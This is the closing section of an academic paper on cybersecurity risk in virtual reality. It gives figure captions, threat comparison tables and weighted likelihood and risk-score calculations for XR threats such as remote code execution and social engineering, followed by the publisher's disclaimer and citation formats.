Figure 13. Risk scores of identified XR threats based on likelihood, vulnerability, and impact. Remote Code Execution (RCE), social engineering, and insecure app installation have the highest overall risk levels. Privacy threats such as eavesdropping, surveillance, and location tracking score lower but remain important due to their potential to compromise user confidentiality.
Figure 13. Risk scores of identified XR threats based on likelihood, vulnerability, and impact. Remote Code Execution (RCE), social engineering, and insecure app installation have the highest overall risk levels. Privacy threats such as eavesdropping, surveillance, and location tracking score lower but remain important due to their potential to compromise user confidentiality.
Information 16 00430 g013
Figure 14. Comparison of vulnerability severity and resulting impact across identified XR threats. Remote Code Execution and social engineering demonstrate the highest vulnerability scores, reflecting widely exploitable system weaknesses.
Figure 14. Comparison of vulnerability severity and resulting impact across identified XR threats. Remote Code Execution and social engineering demonstrate the highest vulnerability scores, reflecting widely exploitable system weaknesses.
Information 16 00430 g014
Figure 15. Comparative view of threat likelihood and impact across XR attack scenarios. While all threats show relatively high impact values, likelihood scores remain low due to reliance on user interaction and permission prompts.
Figure 15. Comparative view of threat likelihood and impact across XR attack scenarios. While all threats show relatively high impact values, likelihood scores remain low due to reliance on user interaction and permission prompts.
Information 16 00430 g015
Table 1. Distinction between threats common to smart devices and those unique to XR.
Table 1. Distinction between threats common to smart devices and those unique to XR.
ThreatApplies to IoT/Smart DevicesUnique in XR Environments
Microphone hijackingApplicableApplicable
Camera accessApplicableApplicable, but this feature is used for environment mapping, hand tracking, etc., increasing sensitivity
MalwareApplicableApplicable: malware can hijack virtual environments and control user perception
Spatial manipulationNot applicableApplicable, XR-only threat: this feature is used to modify boundary tracking or virtual navigation
Immersive deceptionNot appliableApplicable: attackers can create malicious visual overlays in a VR/AR scene
Physical–virtual boundary disruptionNot applicableApplicable: attackers may influence real-world actions via altered virtual cues
Table 2. Comparison of related studies on risk assessment in XR environments.
Table 2. Comparison of related studies on risk assessment in XR environments.
Refs.MethodField of FocusKey ContributionsLimitations
[21]SurveyAR and VR devices and applicationsReconnaissance and vulnerability identificationLack of a structured risk scoring model
[27]Attack treesVR for educational environmentsRisk quantification based on attack frequency and durationNo practical simulation or quantitative vulnerability scoring system
[10]SurveyGeneral XR
domain
Identification of device-specific cyberattacks in critical domainsRisk prioritization lacks vulnerability scoring based only on likelihood and impact
[42]Risk analysis frameworkAutomotive-AR-specific domainA general safety-focused risk analysis method for cyber–physical interactionFocused on human interaction and safety, not cybersecurity
[9]Static code analysisOculus-based VR applicationsDevelopment of a tool (VR-SP) for ensuring app security and privacy auditingLacked real-world threat modeling and user-behavior-based risk evaluation
This studyPenetration testing and Structured Risk AssessmentXR environment devicesScenario-driven real-world attack simulations, structured likelihood model development, and hybrid CVSS-based risk scoringGeneralizable to multiple XR domains and integrates technical and human factors in a comprehensive scoring framework
Table 3. Conditions that are considered in order to assign values to likelihood factors.
Table 3. Conditions that are considered in order to assign values to likelihood factors.
FactorWhat It MeasuresLow Value (1–4)Medium Value (5–7)High Value (8–10)
UBSHow likely users fall for attackZero-click attack, requires no user interactionSome social engineering requiredHighly dependent on phishing/social engineering
VEEHow easy the exploit isZero-day, complex, no public toolsIt requires user privileges; some public exploits existIt is a public exploit; no privileges are required; Metasploit tools exist
SELHow exposed the vulnerable system isRequires physical access, highly restrictedRequires internal network access, VPN neededPublic internet exposure, easy external access
APAHow often this exploit is used in attacksNo known attacks, private, zero-daySome malware families use itActively exploited in the real-world attacks, it is used by ransomware and APT groups
Table 4. The probability of each issue occurring in an XR environment ((3 × UBS) + (2 × VEE) + (2 × SEL) + (3 × APA)/100).
Table 4. The probability of each issue occurring in an XR environment ((3 × UBS) + (2 × VEE) + (2 × SEL) + (3 × APA)/100).
ThreatsUBS × 3VEE × 2SEL × 2APA × 3Weighted Likelihood
Insecure App Installation241218210.75
Social Engineering30814270.79
Remote Code Execution (RCE)181816270.79
Unauthorized Access and Data Exfiltration211018240.73
Eavesdropping2.41.212.40.70
Surveillance1.81.212.40.64
Location tracking1.8112.40.62
Using the values for impact and likelihood, we can calculate the risk scores and proceed with the analysis of each threat.
Table 5. A computation of the risk scores.
Table 5. A computation of the risk scores.
ThreatsLikelihoodVulnerabilityImpactRisk Score (L × V × I)
Insecure App Installation0.757.35.530
Social Engineering0.798.85.337
Remote Code Execution (RCE)0.798.85.941
Unauthorized Access and Data Exfiltration0.738.24.225
Eavesdropping0.706.53.616
Surveillance0.646.53.615
Location tracking0.626.53.615
Table 6. Final computed risk score deatiling the impact on CIA and the severity of the impacts.
Table 6. Final computed risk score deatiling the impact on CIA and the severity of the impacts.
ThreatsCIALikelihoodVulnerabilityImpactRisk ScoreSeverity
Insecure App Installation 0.757.35.530High
Social Engineering 0.798.85.337High
Remote Code Execution (RCE)0.798.85.941High
Unauthorized Access
and Data Exfiltration
0.738.24.225Medium
Eavesdropping 0.706.53.616Low
Surveillance 0.646.53.615Low
Location tracking 0.626.53.615Low
√ indicates that the threat impacts the corresponding CIA security property.
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content.

Share and Cite

MDPI and ACS Style

Acheampong, R.; Popovici, D.-M.; Balan, T.C.; Rekeraho, A.; Oprea, I.-A. A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality. Information 2025, 16, 430. https://doi.org/10.3390/info16060430

AMA Style

Acheampong R, Popovici D-M, Balan TC, Rekeraho A, Oprea I-A. A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality. Information. 2025; 16(6):430. https://doi.org/10.3390/info16060430

Chicago/Turabian Style

Acheampong, Rebecca, Dorin-Mircea Popovici, Titus C. Balan, Alexandre Rekeraho, and Ionut-Alexandru Oprea. 2025. "A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality" Information 16, no. 6: 430. https://doi.org/10.3390/info16060430

APA Style

Acheampong, R., Popovici, D.-M., Balan, T. C., Rekeraho, A., & Oprea, I.-A. (2025). A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality. Information, 16(6), 430. https://doi.org/10.3390/info16060430

Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here.

Article Metrics

Back to TopTop